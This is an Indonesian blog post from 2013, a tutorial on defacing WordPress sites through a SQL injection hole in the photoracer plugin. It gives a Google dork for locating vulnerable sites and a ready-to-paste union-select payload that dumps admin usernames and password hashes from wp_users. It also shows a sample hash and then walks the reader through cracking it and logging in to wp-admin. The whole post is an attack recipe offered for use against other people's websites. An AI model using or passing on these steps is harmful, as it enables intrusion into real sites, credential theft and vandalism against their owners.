Cara Deface Dengan Exploit Wordpress Cara Deface Dengan Exploit Wordpress

Tuesday, April 2, 2013

Cara Deface Dengan Exploit Wordpress


Ya, memang tutorial ini merupakan tutorial lama tapi tidak ada salahnya kan berbagi? Ok simak saja baik - baik.

1. Ketik dork berikut ke kotak pencarian google :
inurl:"wp-content/plugins/photoracer/viewimg.php?id="

2. Nantinya akan muncul beberapa web, buka salah satu untuk di eksekusi.

3. Tambahkan exploit ini di belakang url :

    +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users

Contoh : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1
menjadiwww.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users

4. Nah, nanti bakalan muncul penampakan username dan password dari web tersebut.Contoh :
admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1

5. Disitu, bentuk password masih berupa salt/MD5. Silahkan anda crack terlebih dahulu,
untuk password yang berupa MD5 bisa di crack disini 6. Jika sudah dapat username dan passwordnya, anda login ke web tersebut melalui www.site.com/wp-admin/ Selamat mencoba ^_^

0 comments:

Post a Comment

pendapat ada tentang blog ini ?

 
bloger hat © 2013 Templates | imamkenteng